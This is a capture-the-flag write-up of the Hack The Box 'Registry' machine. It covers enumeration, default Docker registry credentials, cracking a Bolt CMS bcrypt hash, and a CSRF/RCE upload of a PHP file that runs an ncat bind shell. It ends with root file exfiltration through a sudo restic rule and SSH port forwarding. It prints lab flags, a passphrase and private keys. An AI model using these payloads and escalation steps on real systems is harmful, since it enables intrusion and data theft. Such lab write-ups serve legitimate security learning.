< back
RHOST: 10.10.10.159
LHOST: xx.xx.xx.xx
Initial Enumeration
As always started off with an nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 08:44 EST
Nmap scan report for 10.10.10.159
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds
nginx webserver with HTTP and HTTPs ports open. Requests to both ports just
led to the default nginx page. Since 443 has a self-signed cert just like the
Mango box I took a look at the cert to see if we had another vhost setup we
could go to.
There is a docker.registry.htb shown on the cert, so I added it to my
/etc/hosts file but all the request returned was a 200 OK with no content.
I moved onto enumeration of URL paths with gobuster.
root@kali:~# /home/kali/go/bin/gobuster dir -u registry.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://registry.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/02/06 08:48:18 Starting gobuster
===============================================================
/.hta (Status: 403)
/.bash_history (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/install (Status: 301)
/test (Status: 301)
===============================================================
2020/02/06 08:51:51 Finished
===============================================================
Found some paths of interest, /install and /test.
/test gave a 403 forbidden response, and /install returned some binary
data.
root@kali:~# http --follow registry.htb/test
HTTP/1.1 403 Forbidden
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Thu, 06 Feb 2020 13:54:45 GMT
Server: nginx/1.14.0 (Ubuntu)
Transfer-Encoding: chunked
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
root@kali:~# http --follow registry.htb/install
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Thu, 06 Feb 2020 13:54:52 GMT
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
+-----------------------------------------+
| NOTE: binary data not shown in terminal |
+-----------------------------------------+
I downloaded the binary data onto my system to take a closer look. It seemed to be a gzip'd archive.
root@kali:~# wget registry.htb/install
--2020-02-06 08:54:34-- http://registry.htb/install
Resolving registry.htb (registry.htb)... 10.10.10.159
Connecting to registry.htb (registry.htb)|10.10.10.159|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://registry.htb/install/ [following]
--2020-02-06 08:54:34-- http://registry.htb/install/
Reusing existing connection to registry.htb:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘install’
install [ <=> ] 1.03K --.-KB/s in 0s
2020-02-06 08:54:35 (56.6 MB/s) - ‘install’ saved [1050]
root@kali:~# file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200
I extracted the archive and found two files inside.
root@kali:~# tar -xvf install -C registry-binary/
gzip: stdin: unexpected end of file
ca.crt
readme.md
tar: Child returned status 1
tar: Error is not recoverable: exiting now
root@kali:~# ls registry-binary/
ca.crt readme.md
A certificate and a readme file.
root@kali:~# cat registry-binary/ca.crt
-----BEGIN CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
8/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
7JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
-----END CERTIFICATE-----
root@kali:~# cat registry-binary/readme.md
# Private Docker Registry
- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/
Looks like the docker subdomain we found at the start is relevant after all. I've had some experience with docker before but docker registries are a new concept to me, time to do some reading!
Docker registry
OK so after reading the manual a bit, I now know a docker registry contains
docker images, and you can self host docker registries. Evidently there's
a self hosted docker registry at docker.registry.htb which we need to access.
There's an HTTP API available with docker registry but unfortunately in our case the registry has authentication enabled.
root@kali:~# http --verify=no https://docker.registry.htb/v2/
HTTP/1.1 401 Unauthorized
Connection: keep-alive
Content-Length: 87
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 14:23:43 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Www-Authenticate: Basic realm="Registry"
X-Content-Type-Options: nosniff
{
"errors": [
{
"code": "UNAUTHORIZED",
"detail": null,
"message": "authentication required"
}
]
}
In order to login to the docker registry we use the docker login command.
I'll try admin:admin.
root@kali:~# docker login docker.registry.htb
Username: admin
Password:
Error response from daemon: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority
The cert from the registry is self-signed so the login command doesn't work
OOTB. Luckily we came across the cert earlier from the /install path, and
from the docs linked in the readme.md file I know to place it in
/etc/docker/certs.d/docker.register.domain/
root@kali:~# mkdir -p /etc/docker/certs.d/docker.registry.htb/
root@kali:~# mv /etc/docker/certs.d/
root@kali:~# mv /etc/docker/certs.d/ca.crt /etc/docker/certs.d/docker.registry.htb/
root@kali:~# docker login docker.registry.htb
Username: admin
Password:
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store
Login Succeeded
Yay! We managed to login on the first try with the creds admin:admin.
Since we have working credentials for the docker registry, let's return to the HTTP API and see what the registry contains.
root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 2
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:53:21 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
{}
root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/_catalog
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 32
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:54:42 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
{
"repositories": [
"bolt-image"
]
}
OK, looks like there's an image we can pull called bolt-image, so let's pull it from the registry.
root@kali:~# docker pull docker.registry.htb/bolt-image
Using default tag: latest
latest: Pulling from bolt-image
f476d66f5408: Pull complete
8882c27f669e: Pull complete
d9af21273955: Pull complete
f5029279ec12: Pull complete
2931a8b44e49: Pull complete
c71b0b975ab8: Pull complete
02666a14e1b5: Pull complete
3f12770883a6: Pull complete
302bfcb3f10c: Pull complete
Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b
Status: Downloaded newer image for docker.registry.htb/bolt-image:latest
docker.registry.htb/bolt-image:latest
Now let's run the docker image and attach ourself to the running bolt-image container.
root@kali:~# docker run -d -it -p 80:80 docker.registry.htb/bolt-image
69fcf6aa5ea422306bcd9d8ad5030ee3f02b82d395c06990197b2a67d97abbb9
root@kali:~# docker attach 69fcf6aa5ea422306bcd9d8ad5030ee3f02b82d395c06990197b2a67d97abbb9
root@69fcf6aa5ea4:/#
Finding secrets in the dev environment
Alright let's have a closer look. Since this seems to be an image for the Bolt
CMS system, my first instinct is to look at the /var/www directory.
root@69fcf6aa5ea4:/# ls /var/www/html/
index.html sync.sh
OK, just one html file and a bash script called sync.sh
root@69fcf6aa5ea4:/# cat /var/www/html/sync.sh
#!/bin/bash
rsync -azP registry:/var/www/html/bolt .
rsync uses the same syntax as ssh so looking at the ssh config file we can
see what is setup for the host named registry
root@69fcf6aa5ea4:/# cat /root/.ssh/config
Host registry
User bolt
Port 22
Hostname registry.htb
So running the sync.sh script will copy the bolt directory over from
registry.htb using the user bolt. Let's give it a shot.
root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh
ssh: Could not resolve hostname registry.htb: Name or service not known
rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
rsync error: unexplained error (code 255) at io.c(235) [Receiver=3.1.2]
root@69fcf6aa5ea4:/# echo '10.10.10.159 registry.htb' >> /etc/hosts
root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh
Warning: Permanently added the ECDSA host key for IP address '10.10.10.159' to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
Oops looks like we need a passphrase to unlock the RSA key.
root@69fcf6aa5ea4:/# cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
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
Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H
pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s
OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B
Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR
bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM
PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu
Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ
ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI
f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9
RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----
root@69fcf6aa5ea4:/#
Let's get our familiar friend john to give us a hand.
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt bolt_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 4 needed for performance.
0g 0:00:00:04 DONE (2020-02-06 11:27) 0g/s 3304Kp/s 3304Kc/s 3304KC/sa6_123..*7¡Vamos!
Session completed
Shit... no luck with the rockyou.txt wordlist. I tried a few more wordlists.
root@kali:~# john --wordlist=/root/all.txt bolt_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2020-02-06 11:40) 0g/s 3410Kp/s 3410Kc/s 3410KC/s {kjhfn..{ysrfk
Session completed
root@kali:~# john --wordlist=/root/Downloads/crackstation-human-only.txt bolthash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
0g 0:00:00:21 DONE (2020-02-06 11:54) 0g/s 2906Kp/s 2906Kc/s 2906KC/s ����
Session completed
Did a search for bash scripts on the system and found an interesting one
/etc/profile.d/01-ssh.sh, the usecase seems to be adding the RSA key to
ssh-agent so the user doesn't have to type their passphrase everytime the key
is being used, now we have the ssh key passphrase GkOcz221Ftb3ugog!
root@69fcf6aa5ea4:/# find / -name '*.sh'
/etc/init.d/hwclock.sh
/etc/profile.d/01-locale-fix.sh
/etc/profile.d/01-ssh.sh
/lib/init/vars.sh
/var/www/html/sync.sh
/usr/share/debconf/confmodule.sh
/usr/share/vim/vim80/macros/less.sh
root@69fcf6aa5ea4:/# cat /etc/profile.d/01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
root@69fcf6aa5ea4:/#
I ssh'd into the registry box and grabbed the user flag.
root@69fcf6aa5ea4:/# ssh registry
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Thu Feb 6 17:23:23 UTC 2020
System load: 0.0 Users logged in: 0
Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159
Memory usage: 24% IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 153
Last login: Thu Feb 6 16:06:42 2020 from 10.10.14.55
bolt@bolt:~$ ls
user.txt
bolt@bolt:~$ cat user.txt
ytc0ytdmnzywnzgxngi0zte0otm3ywzi
Hol' up back it up there
Again I headed to /var/www since the box is running Bolt CMS. Came across
a sqlite db file, as well as a backup.php which looked interesting.
bolt@bolt:~$ ls -lah /var/www/html
total 28K
drwxrwxr-x 4 www-data www-data 4.0K Oct 21 08:41 .
drwxr-xr-x 4 root root 4.0K May 26 2019 ..
-rw-r--r-- 1 root root 85 May 25 2019 backup.php
-rw------- 1 git www-data 0 Oct 8 21:54 .bash_history
drwxrwxr-x 11 www-data www-data 4.0K Oct 21 08:27 bolt
-rwxrwxr-x 1 www-data www-data 612 May 6 2019 index.html
-rw-r--r-- 1 root root 612 Oct 21 08:41 index.nginx-debian.html
drwxr-xr-x 2 root root 4.0K Sep 26 21:13 install
bolt@bolt:~$ ls /var/www/html/bolt/
app codeception.yml composer.lock extensions index.php phpunit.xml.dist src theme
changelog.md composer.json CONTRIBUTING.md files LICENSE.md README.md tests vendor
bolt@bolt:~$ ls /var/www/html/bolt/app
bootstrap.php cache config database deprecated.php nut resources src theme_defaults view web.php
bolt@bolt:~$ ls /var/www/html/bolt/app/database/
bolt.db
bolt@bolt:~$ file /var/www/html/bolt/app/database/bolt.db
/var/www/html/bolt/app/database/bolt.db: SQLite 3.x database, last written using SQLite version 3022000
bolt@bolt:~$ ls -lah /var/www/html/bolt/app/database/bolt.db
-rw-r--r-- 1 www-data www-data 288K Feb 7 07:55 /var/www/html/bolt/app/database/bolt.db
First let's look at the backup.php file.
bolt@bolt:~$ cat /var/www/html/backup.php
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
bolt@bolt:~$
Looks like a certain user on the system can run restic with root priveleges.
I tried with bolt but no luck, so I'm assuming we need to pivot over to
www-data. Seems I'll need to create my own restic server later and use sudo restic to transfer the root flag over.
Next I pulled the sqlite db file down to my localhost to peek inside.
root@kali:~# scp -i boltkey [email protected]:/var/www/html/bolt/app/database/bolt.db bolt.db
Enter passphrase for key 'boltkey':
bolt.db 100% 288KB 46.9KB/s 00:06
root@kali:~# sqlite3 bolt.db
SQLite version 3.31.0 2019-12-29 00:52:41
Enter ".help" for usage hints.
sqlite> .tables
bolt_authtoken bolt_field_value bolt_pages bolt_users
bolt_blocks bolt_homepage bolt_relations
bolt_cron bolt_log_change bolt_showcases
bolt_entries bolt_log_system bolt_taxonomy
sqlite> select * from bolt_users;
1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|[email protected]|2020-02-07 07:56:30|10.10.14.153|Admin|["files://nosus.php"]|1||||0||["root","everyone"]
sqlite>
Dank. We got a hash for the Bolt CMS admin password. We can see $2y$ at the
start so it's hashed with bcrypt. A little help from john again.
root@kali:~# echo '$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK' > boltpwhash
root@kali:~# john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt boltpwhash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry (?)
1g 0:00:00:03 DONE (2020-02-07 03:22) 0.2890g/s 104.0p/s 104.0c/s 104.0C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#
And we got the creds admin:strawberry. I tried the password strawberry on
the registry box user bolt but no luck. So I just used the creds to login to
the Bolt CMS admin portal, since there are exploits available for authenticated
users.
root@kali:~# searchsploit bolt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow | exploits/multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery | exploits/php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting | exploits/php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution | exploits/php/webapps/46664.html
Bolt CMS < 3.6.2 - Cross-Site Scripting | exploits/php/webapps/46014.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/36552.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow | exploits/multiple/remote/24982.txt
CMS Bolt - Arbitrary File Upload (Metasploit) | exploits/php/remote/38196.rb
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities | exploits/php/webapps/21132.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~#
Reverse reverse shell
I used the exploit that leverages CSRF for RCE detailed in /usr/share/exploitdb/exploits/php/webapps/46664.html
There was one big wall in the way though, the box was setup in a way so that it
couldn't initiate any outgoing connections. That meant that I couldn't use
a reverse shell as I couldn't dial out to my localhost from the registry box.
Instead of a reverse shell, I used a netcat bind shell. The nc binary on the
remote host was compiled without the -e flag enabled so I grabbed a prebuilt
static linked binary from
here
and scp'd it over. Then using the CSRF/RCE technique I uploaded my malicious
php script into the bolt upload directory.
<?php exec("/tmp/ncat -vnlp 8888 -e /bin/bash"); ?>
I then dialed into the remote host from my local, and used the python pty trick
to get a fully interactive shell as www-data
root@kali:~# nc registry.htb 8888
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bolt:~/html/bolt/files/2020-02$ ^Z
[1]+ Stopped nc registry.htb 8888
root@kali:~# stty raw -echo
root@kali:~# nc registry.htb 8888
www-data@bolt:~/html/bolt/files/2020-02$
We saw earlier in the backup.php file that we could probably use the restic
command with sudo, and checking sudo -l confirmed this. Now we just needed to
do some careful manipulation in order to run restic as root to be able to
read and transfer /root back to our localhost.
www-data@bolt:~/html/bolt/files/2020-02$ sudo -l
Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
(root) NOPASSWD: /usr/bin/restic backup -r rest*
First I setup restic-server on my localhost, initiated a restic repo and
started the server.
root@kali:~# restic init --repo /root/restic-shit/
enter password for new repository:
enter password again:
created restic repository 97b64df299 at /root/restic-shit/
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
root@kali:~# rest-server --no-auth --path /root/restic-shit
Data directory: /root/restic-shit
Authentication disabled
Private repositories disabled
Starting server on :8000
Then I used ssh to remote forward port 8000 to the registry box since it
couldn't dial out to my box. This meant that I could point to localhost:8000
on the remote host and have it resolve back to my actual localhost:8000.
ssh -N -R 8000:localhost:8000 -i boltkey [email protected]
Now to copy over the /root directory.
</restic backup -r rest:http://localhost:8000 /root/
enter password for repository:
password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:03] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00
duration: 0:03
snapshot 0db157c0 saved
www-data@bolt:~/html/bolt/files/2020-02$ ping 10.10.15.7
Checking the restic backups on my localhost I can see that the /root dir from
remote is there, now I just need to restore it to a location on my localhost
and read the files.
root@kali:~# restic -r rest:http://localhost:8000/ snapshots
enter password for repository:
repository 97b64df2 opened successfully, password is correct
ID Time Host Tags Paths
---------------------------------------------------------------------
0db157c0 2020-02-07 11:41:46 bolt /root
---------------------------------------------------------------------
2 snapshots
root@kali:~# restic -r rest:http://localhost:8000/ restore 0db --target /tmp/restore
enter password for repository:
repository 97b64df2 opened successfully, password is correct
restoring <Snapshot 0db157c0 of [/root] at 2020-02-07 16:41:46.2119485 +0000 UTC by root@bolt> to /tmp/restore
root@kali:~# ls /tmp/restore/
root
root@kali:~# cd /tmp/restore/root/
root@kali:/tmp/restore/root# ls
config.yml cron.sh root.txt
root@kali:/tmp/restore/root# cat root.txt
ntrkzgnkotaxyju0ntrinda4yzbkztgw
Since we also grabbed the private key for root we can also login via ssh!
root@kali:/tmp/restore/root# cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAmiGiXpswTyHhjgC55jHRWlGX1asEMyDFfkVwhuNohv/4cQKm
cJB/3psQocosq+GMh9Y/uRPUgMcDnrTaNYOdkPS+QLd8vcFKSwSewH1w4/AYLuci
4k71qYsJlkcS2Pb0PqEcpodmXf4OBdTCiCCnjgGhOcvPpKMSCb1vy2Yo+A+eHzKp
1S48LgJRLKU1sGe0KE4MC8g7qpF7NSKOCW69z5KaoopQA3jPxnW17WE9PdGZQvqX
